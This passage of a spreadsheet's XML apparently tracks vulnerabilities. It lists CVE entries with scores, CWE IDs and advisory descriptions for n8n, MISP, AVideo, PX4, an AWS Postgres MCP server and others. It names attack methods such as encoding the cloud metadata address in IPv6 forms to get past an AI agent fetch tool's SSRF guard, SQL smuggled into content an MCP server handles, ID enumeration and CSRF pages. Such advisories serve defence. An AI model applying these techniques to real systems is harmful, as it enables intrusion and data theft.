          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3306" s="5" t="inlineStr">
        <is>
          <t>Nightingale (n9e), as of commit 8362cbe (main branch, confirmed 2026-08-27), contains a server-side request forgery vulnerability in the isPublicIP function in aiagent/tools/http.go, the SSRF guard for the http_fetch AI-agent tool. The function only unwraps standard IPv4-mapped (::ffff:a.b.c.d) IPv6 addresses before checking them against the forbidden-range list, and does not classify 6to4 (2002::/16), NAT64 (64:ff9b::/96, 64:ff9b:1::/48), or deprecated site-local (fec0::/10) addresses. On a dual-stack or NAT64-enabled host, an attacker able to supply a URL to the http_fetch tool can bypass the guard by encoding a forbidden IPv4 address (such as the cloud instance-metadata endpoint 169.254.169.254) in one of these IPv6 forms to reach internal or metadata services.</t>
        </is>
      </c>
      <c r="M3306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85692</t>
        </is>
      </c>
    </row>
    <row r="3307">
      <c r="A3307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85787</t>
        </is>
      </c>
      <c r="C3307" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3307" s="5" t="inlineStr"/>
      <c r="F3307" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3307" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H3307" s="5" t="inlineStr"/>
      <c r="I3307" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3307" s="5" t="inlineStr"/>
      <c r="K3307" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L3307" s="5" t="inlineStr">
        <is>
          <t>An incomplete list of disallowed inputs in the SQL validation component in Amazon awslabs postgres-mcp-server before  version 1.1.7 might allow an unauthenticated actor to modify data beyond the read-only scope by placing crafted SQL into the content that is submitted when an authenticated user interacts with the MCP server.
To remediate this issue, users should upgrade to version 1.1.7 or above.</t>
        </is>
      </c>
      <c r="M3307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85787</t>
        </is>
      </c>
    </row>
    <row r="3308">
      <c r="A3308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86081</t>
        </is>
      </c>
      <c r="C3308" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3308" s="5" t="inlineStr"/>
      <c r="F3308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3308" s="5" t="inlineStr"/>
      <c r="H3308" s="5" t="inlineStr"/>
      <c r="I3308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3308" s="5" t="inlineStr"/>
      <c r="K3308" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L3308" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Git node clone operation matched an attacker-controlled destination path against the default N8N_BLOCK_FILE_PATTERNS regular expression. The pattern ^(./).git(/.)$ allowed catastrophic backtracking and ran synchronously in the main n8n process. An authenticated workflow editor could therefore freeze the instance with one workflow execution; the affected default is declared in packages/@n8n/config/src/configs/security.config.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M3308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t>
        </is>
      </c>
    </row>
    <row r="3309">
      <c r="A3309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86082</t>
        </is>
      </c>
      <c r="C3309" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3309" s="5" t="inlineStr"/>
      <c r="F3309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3309" s="5" t="inlineStr"/>
      <c r="H3309" s="5" t="inlineStr"/>
      <c r="I3309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3309" s="5" t="inlineStr"/>
      <c r="K3309" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3309" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the OpenAI Chat Model node enforced credential allowed-domain restrictions for normal calls but not for the model-search dropdown. A workflow editor could set options.baseURL to an arbitrary host and make the searchModels path send the openAiApi credential there. The affected implementation is packages/@n8n/nodes-langchain/nodes/llms/LMChatOpenAi/methods/loadModels.ts, which omitted assertOpenAiCredentialAllowsUrl. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M3309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86082</t>
        </is>
      </c>
    </row>
    <row r="3310">
      <c r="A3310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86091</t>
        </is>
      </c>
      <c r="C3310" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3310" s="5" t="inlineStr"/>
      <c r="F3310" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3310" s="5" t="inlineStr"/>
      <c r="H3310" s="5" t="inlineStr"/>
      <c r="I3310" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3310" s="5" t="inlineStr"/>
      <c r="K3310" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3310" s="5" t="inlineStr">
        <is>
          <t>ntopng before 6.7.260717 fails to check user privileges in the pools bulk-delete endpoint, allowing authenticated non-administrators to delete all host pools and member bindings. Attackers can issue POST requests to the delete pools endpoint to irreversibly destroy every host pool, removing traffic policy bindings and visibility restrictions that may bypass security policies.</t>
        </is>
      </c>
      <c r="M3310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86091</t>
        </is>
      </c>
    </row>
    <row r="3311">
      <c r="A3311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86097</t>
        </is>
      </c>
      <c r="C3311" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3311" s="5" t="inlineStr"/>
      <c r="F3311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3311" s="5" t="inlineStr"/>
      <c r="H3311" s="5" t="inlineStr"/>
      <c r="I3311" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3311" s="5" t="inlineStr"/>
      <c r="K3311" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3311" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a null pointer dereference vulnerability in param_set_default_file() and param_set_backup_file() functions that allows attackers to crash the autopilot process. Attackers can invoke 'param select' or 'param select-backup' commands with no path argument from any PX4 shell to trigger the crash.</t>
        </is>
      </c>
      <c r="M3311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86097</t>
        </is>
      </c>
    </row>
    <row r="3312">
      <c r="A3312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86111</t>
        </is>
      </c>
      <c r="C3312" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3312" s="5" t="inlineStr"/>
      <c r="F3312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3312" s="5" t="inlineStr"/>
      <c r="H3312" s="5" t="inlineStr"/>
      <c r="I3312" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3312" s="5" t="inlineStr"/>
      <c r="K3312" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3312" s="5" t="inlineStr">
        <is>
          <t>BookWyrm through 0.9.1 fails to validate user visibility permissions in the status edit endpoint, allowing authenticated attackers to read followers-only and direct-message reviews by enumerating sequential status IDs. Attackers can access the raw content of restricted statuses through the edit view, bypassing the privacy protections documented for these message types.</t>
        </is>
      </c>
      <c r="M3312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86111</t>
        </is>
      </c>
    </row>
    <row r="3313">
      <c r="A3313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86113</t>
        </is>
      </c>
      <c r="C3313" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3313" s="5" t="inlineStr"/>
      <c r="F3313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3313" s="5" t="inlineStr"/>
      <c r="H3313" s="5" t="inlineStr"/>
      <c r="I3313" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3313" s="5" t="inlineStr"/>
      <c r="K3313" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3313" s="5" t="inlineStr">
        <is>
          <t>BookWyrm through 0.9.1 contains an authorization bypass vulnerability in the edit_readthrough function that allows authenticated users to modify other users' reading records. Attackers can exploit sequential ReadThrough IDs to overwrite arbitrary users' start dates, finish dates, progress, and progress mode, affecting reading statistics and exported data.</t>
        </is>
      </c>
      <c r="M3313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86113</t>
        </is>
      </c>
    </row>
    <row r="3314">
      <c r="A3314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86116</t>
        </is>
      </c>
      <c r="C3314" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3314" s="5" t="inlineStr"/>
      <c r="F3314" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3314" s="5" t="inlineStr"/>
      <c r="H3314" s="5" t="inlineStr"/>
      <c r="I3314" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3314" s="5" t="inlineStr"/>
      <c r="K3314" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3314" s="5" t="inlineStr">
        <is>
          <t>Metabase versions before 0.63.1 fail to enforce data analyst permission checks on glossary API endpoints, allowing any authenticated user to create, modify, and delete glossary entries. Attackers can submit requests to POST, PUT, and DELETE glossary endpoints to tamper with instance-wide business glossary data without proper authorization.</t>
        </is>
      </c>
      <c r="M3314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86116</t>
        </is>
      </c>
    </row>
    <row r="3315">
      <c r="A3315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86175</t>
        </is>
      </c>
      <c r="C3315" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3315" s="5" t="inlineStr"/>
      <c r="F3315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3315" s="5" t="inlineStr"/>
      <c r="H3315" s="5" t="inlineStr"/>
      <c r="I3315" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3315" s="5" t="inlineStr"/>
      <c r="K3315" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3315" s="5" t="inlineStr">
        <is>
          <t>NetBox through 4.7.0 fails to redact sensitive data source backend credentials in REST and GraphQL API responses. Authenticated users with only view permission can retrieve plaintext passwords and secret keys for Git and Amazon S3 backends through API endpoints, gaining unauthorized access to external repositories and storage buckets.</t>
        </is>
      </c>
      <c r="M3315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86175</t>
        </is>
      </c>
    </row>
    <row r="3316">
      <c r="A3316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86192</t>
        </is>
      </c>
      <c r="C3316" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3316" s="5" t="inlineStr"/>
      <c r="F3316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3316" s="5" t="inlineStr"/>
      <c r="H3316" s="5" t="inlineStr"/>
      <c r="I3316" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3316" s="5" t="inlineStr"/>
      <c r="K3316" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3316" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 fail to properly filter private attribute-view cell values in the getAttributeViewKeys endpoint. Publish readers can retrieve hidden KeyValues payloads from rows bound to inaccessible documents, exposing private database contents without authorization.</t>
        </is>
      </c>
      <c r="M3316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86192</t>
        </is>
      </c>
    </row>
    <row r="3317">
      <c r="A3317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86204</t>
        </is>
      </c>
      <c r="C3317" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3317" s="5" t="inlineStr"/>
      <c r="F3317" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3317" s="5" t="inlineStr"/>
      <c r="H3317" s="5" t="inlineStr"/>
      <c r="I3317" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3317" s="5" t="inlineStr"/>
      <c r="K3317" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3317" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 fail to limit JSON payload size in ModalFormResponsePacket handling, allowing authenticated players to cause denial of service. Attackers can send modal form response packets with massive JSON arrays to exhaust server memory and CPU resources, rendering the server unresponsive.</t>
        </is>
      </c>
      <c r="M3317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86204</t>
        </is>
      </c>
    </row>
    <row r="3318">
      <c r="A3318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86255</t>
        </is>
      </c>
      <c r="C3318" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3318" s="5" t="inlineStr"/>
      <c r="F3318" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3318" s="5" t="inlineStr"/>
      <c r="H3318" s="5" t="inlineStr"/>
      <c r="I3318" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3318" s="5" t="inlineStr"/>
      <c r="K3318" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3318" s="5" t="inlineStr">
        <is>
          <t>wger before 2.5 fails to validate the maximum duration of routine date ranges, allowing authenticated users to create routines spanning arbitrarily long periods. Attackers can trigger the date_sequence computation via routine detail endpoints, forcing the server to iterate thousands of times per request and exhaust worker threads, denying service to legitimate users.</t>
        </is>
      </c>
      <c r="M3318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86255</t>
        </is>
      </c>
    </row>
    <row r="3319">
      <c r="A3319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86283</t>
        </is>
      </c>
      <c r="C3319" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3319" s="5" t="inlineStr"/>
      <c r="F3319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3319" s="5" t="inlineStr"/>
      <c r="H3319" s="5" t="inlineStr"/>
      <c r="I3319" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3319" s="5" t="inlineStr"/>
      <c r="K3319" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="L3319" s="5" t="inlineStr">
        <is>
          <t>MISP's UiBeta theme collection view (app/View/Themed/UiBeta/Collections/view.ctp) performed a secondary query of member events by UUID without applying the caller's access control list (ACL). The CollectionsController::view() action correctly resolved collection element UUIDs through Event::fetchSimpleEvents($user, ...), which enforces per-user event ACL. However, the view template independently re-queried the same UUIDs using only an Event.uuid IN (...) condition, omitting the createEventConditions() authorization filter. Because collection element UUIDs are stored without server-side authorization against the referenced event (CollectionElementsController::add() accepts whatever UUID the collection owner posts), an authenticated user with view access to a collection could retrieve full details of events they are not permitted to read. The exposed data included event identifiers, info, dates, timestamps, creator organization, all event tags, and galaxy clusters (the latter attached via a cluster-scoped rather than event-scoped ACL check). This constitutes an authorization bypass at the presentation layer, allowing horizontal privilege escalation across event boundaries within the MISP instance.</t>
        </is>
      </c>
      <c r="M3319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86283</t>
        </is>
      </c>
    </row>
    <row r="3320">
      <c r="A3320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86347</t>
        </is>
      </c>
      <c r="C3320" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3320" s="5" t="inlineStr"/>
      <c r="F3320" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3320" s="5" t="inlineStr"/>
      <c r="H3320" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I3320" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3320" s="5" t="inlineStr"/>
      <c r="K3320" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-862</t>
        </is>
      </c>
      <c r="L3320" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP allow any authenticated user to access TemplatesController::uploadFile() because the ACL entry for templates/uploadFile used the wildcard *. This bypasses the intended role restrictions applied to neighboring template-management operations.
The upload handler accepts arbitrary content with only minimal checks and writes it into app/tmp/files/. A low-privileged or read-only user can therefore repeatedly upload files and consume server disk space without requiring perm_add or perm_template. The fix changes the ACL requirement from * to perm_add.
The commit also rules out stronger impacts: uploaded files receive random names, path traversal/predictable overwrite is not available, the temporary directory is outside the web root, and the files are not directly served over HTTP. Therefore, the issue should not be described as arbitrary file overwrite, stored XSS, or RCE.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86347</t>
        </is>
      </c>
    </row>
    <row r="3321">
      <c r="A3321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86408</t>
        </is>
      </c>
      <c r="C3321" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3321" s="5" t="inlineStr"/>
      <c r="F3321" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3321" s="5" t="inlineStr"/>
      <c r="H3321" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I3321" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3321" s="5" t="inlineStr"/>
      <c r="K3321" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L3321" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP do not enforce parent-event visibility when serving cryptographic keys through CryptographicKeysController::view().
The vulnerable handler queried CryptographicKey directly using the supplied key ID and selected sensitive fields such as:
  *  
type
  *  
key_data
  *  
fingerprint
but did not fetch or authorize the associated parent event first.
The upstream commit explicitly states that cryptographicKeys/view could return a protected event’s signing key to any authenticated user.
The fix adds parent_id and parent_type to the lookup and then enforces authorization through the associated event using fetchSimpleEvent($user, parent_id). If the parent is not an Event, access is limited to site administrators.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86408</t>
        </is>
      </c>
    </row>
    <row r="3322">
      <c r="A3322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86713</t>
        </is>
      </c>
      <c r="C3322" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3322" s="5" t="inlineStr"/>
      <c r="F3322" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3322" s="5" t="inlineStr"/>
      <c r="H3322" s="5" t="inlineStr"/>
      <c r="I3322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3322" s="5" t="inlineStr"/>
      <c r="K3322" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3322" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a use-after-free vulnerability in the load_mon module's stop path where exit_and_cleanup() deletes the LoadMon object and frees the performance counter before perf_end() attempts to access it. Attackers can trigger this vulnerability by issuing the load_mon stop command from any PXH or MAVLink shell, causing reads and writes through freed memory that corrupt heap objects and destabilize the flight stack.</t>
        </is>
      </c>
      <c r="M3322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t>
        </is>
      </c>
    </row>
    <row r="3323">
      <c r="A3323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86718</t>
        </is>
      </c>
      <c r="C3323" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3323" s="5" t="inlineStr"/>
      <c r="F3323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3323" s="5" t="inlineStr"/>
      <c r="H3323" s="5" t="inlineStr"/>
      <c r="I3323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3323" s="5" t="inlineStr"/>
      <c r="K3323" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3323" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in deleteHistory.json.php and finishAll.json.php that allows unauthenticated attackers to mutate live history by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrator browsers to delete all live transmission history or mark streams as finished when an admin visits the attacker-controlled site.</t>
        </is>
      </c>
      <c r="M3323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t>
        </is>
      </c>
    </row>
    <row r="3324">
      <c r="A3324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86724</t>
        </is>
      </c>
      <c r="C3324" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3324" s="5" t="inlineStr"/>
      <c r="F3324" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3324" s="5" t="inlineStr"/>
      <c r="H3324" s="5" t="inlineStr"/>
      <c r="I3324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3324" s="5" t="inlineStr"/>
      <c r="K3324" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3324" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in plugin/YPTWallet/view/saveBalance.php that allows attackers to set arbitrary wallet balances by relying only on session cookies without token validation. Attackers can craft a malicious webpage that, when loaded by an administrator, submits a POST request to modify any user's wallet balance to any value.</t>
        </is>
      </c>
      <c r="M3324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t>
        </is>
      </c>
    </row>
    <row r="3325">
      <c r="A3325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86725</t>
        </is>
      </c>
      <c r="C3325" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3325" s="5" t="inlineStr"/>
      <c r="F3325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3325" s="5" t="inlineStr"/>
      <c r="H3325" s="5" t="inlineStr"/>
      <c r="I3325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3325" s="5" t="inlineStr"/>
      <c r="K3325" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3325" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in the SocialMediaPublisher plugin's add.json.php endpoint that allows authenticated users to modify other users' OAuth token records. Attackers can supply arbitrary row IDs to overwrite another user's stored access_token and refresh_token, then delete the compromised record to destroy the victim's provider linkage.</t>
        </is>
      </c>
      <c r="M3325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t>
        </is>
      </c>
    </row>
    <row r="3326">
      <c r="A3326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86726</t>
        </is>
      </c>
      <c r="C3326" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3326" s="5" t="inlineStr"/>
      <c r="F3326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3326" s="5" t="inlineStr"/>
      <c r="H3326" s="5" t="inlineStr"/>
      <c r="I3326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3326" s="5" t="inlineStr"/>
      <c r="K3326" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3326" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an information disclosure vulnerability in restreamsActive.json.php that allows authenticated streamers to enumerate source stream keys and identities of all other streamers' active restreams. The endpoint fails to filter results by user ownership, exposing sensitive transmission credentials and streamer identity across all accounts to any user with streaming capability.</t>
        </is>
      </c>
      <c r="M3326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86726</t>
        </is>
      </c>
    </row>
    <row r="3327">
      <c r="A3327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86731</t>
        </is>
      </c>
